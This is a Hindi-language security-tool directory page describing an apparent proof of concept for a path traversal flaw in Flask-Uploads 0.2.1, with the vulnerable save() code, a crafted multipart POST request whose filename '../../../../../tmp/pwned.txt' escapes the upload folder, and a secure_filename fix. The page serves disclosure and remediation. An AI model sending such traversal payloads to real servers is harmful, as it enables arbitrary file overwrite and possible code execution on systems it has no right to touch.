Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-Pending-Flask-Uploads-Path-Traversal-PoC — CWE-22 Path Traversal in Flask-Uploads 0.2.1 का प्रदर्शन. केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए. Python 3.11 पर परीक्षण किया गया. | Kitploit
उपकरण/GitHubGitHub/nicetop1027/cve-2026-pending-flask-uploads-path-traversal-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnicetop1027/cve-2026-pending-flask-uploads-path-traversal-poc

CVE-2026-Pending-Flask-Uploads-Path-Traversal-PoC

CWE-22 Path Traversal in Flask-Uploads 0.2.1 का प्रदर्शन. केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए. Python 3.11 पर परीक्षण किया गया.

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-XXXXX (लंबित): Flask-Uploads में पथ ट्रैवर्सल

भेद्यता जानकारी

  • उत्पाद: Flask-Uploads
  • संस्करण: 0.2.1 (और संभावित रूप से पुराने संस्करण)
  • भेद्यता प्रकार: पथ ट्रैवर्सल (निर्देशिका ट्रैवर्सल)
  • CWE-ID: CWE-22
  • गंभीरता: उच्च (CVSS 7.5)
  • प्रभाव: मनमाना फ़ाइल लेखन, दूरस्थ कोड निष्पादन (RCE)

विवरण

Flask-Uploads संस्करण 0.2.1 में एक गंभीर पथ ट्रैवर्सल भेद्यता मौजूद है। यह लाइब्रेरी अपलोड की गई फ़ाइलों के फ़ाइलनामों को फ़ाइल सिस्टम में सहेजने से पहले ठीक से सैनिटाइज़ करने में विफल रहती है।

विशेष रूप से, flask_uploads.py में save() विधि अपलोड गंतव्य पथ को उपयोगकर्ता द्वारा प्रदान किए गए फ़ाइलनाम के साथ os.path.join() का उपयोग करके सीधे जोड़ती है। यह एक हमलावर को फ़ाइलनाम में निर्देशिका ट्रैवर्सल अनुक्रम (जैसे, ../../) शामिल करने की अनुमति देता है, जिससे वे सर्वर फ़ाइल सिस्टम पर मनमाने स्थानों पर फ़ाइलें लिख सकते हैं।

मूल कारण विश्लेषण

फ़ाइल: flask_uploads.py (v0.2.1 में पंक्ति 132)

root@kitploit:~
def save(self, storage, filename=None):
    if filename is None:
        filename = storage.filename
    # VULNERABLE CODE: No sanitization of 'filename'
    target = os.path.join(self.destination, filename)
    storage.save(target)
    return filename

एप्लिकेशन डेवलपर पर फ़ाइलनाम को सैनिटाइज़ करने के लिए निर्भर करता है, लेकिन लाइब्रेरी दस्तावेज़ीकरण यह संकेत देता है कि यह फ़ाइल अपलोड को सुरक्षित रूप से संभालता है। डिफ़ॉल्ट रूप से, यदि कोई डेवलपर अनुरोध से कच्चा फ़ाइलनाम पास करता है, तो यह एक भेद्यता की ओर ले जाता है।

प्रभाव

  1. मनमाना फ़ाइल अधिलेखन: हमलावर महत्वपूर्ण सिस्टम फ़ाइलों (जैसे, ssh_host_key, कॉन्फ़िगरेशन फ़ाइलें) को अधिलेखित कर सकते हैं।
  2. दूरस्थ कोड निष्पादन (RCE): एक दुर्भावनापूर्ण स्क्रिप्ट (जैसे, .php, .py) को ऐसी निर्देशिका में अपलोड करके जो वेब सर्वर द्वारा निष्पादित की जाती है (जैसे cgi-bin या कोई ज्ञात स्थिर फ़ोल्डर), एक हमलावर सर्वर पर मनमाना कमांड निष्पादित कर सकता है।

प्रूफ ऑफ कॉन्सेप्ट (PoC)

एक हमलावर एक निर्मित फ़ाइलनाम के साथ POST अनुरोध भेजकर इस भेद्यता का शोषण कर सकता है:

root@kitploit:~
POST /upload HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="../../../../../tmp/pwned.txt"
Content-Type: text/plain

HACKED
------WebKitFormBoundary--

यदि सर्वर इस फ़ाइल को सहेजने के लिए Flask-Uploads का उपयोग करता है, तो यह इच्छित अपलोड निर्देशिका के बजाय /tmp/pwned.txt पर लिखा जाएगा।

शमन / सुधार

लाइब्रेरी को यह सत्यापित करना चाहिए कि जोड़ा गया पथ इच्छित निर्देशिका के अंदर है, os.path.abspath और startswith का उपयोग करके, या हमेशा werkzeug.utils.secure_filename जैसे सैनिटाइज़ेशन फ़ंक्शन का उपयोग करें।

अनुशंसित सुधार:

root@kitploit:~
from werkzeug.utils import secure_filename

# ...
filename = secure_filename(filename) 
target = os.path.join(self.destination, filename)
टूल डाउनलोड करें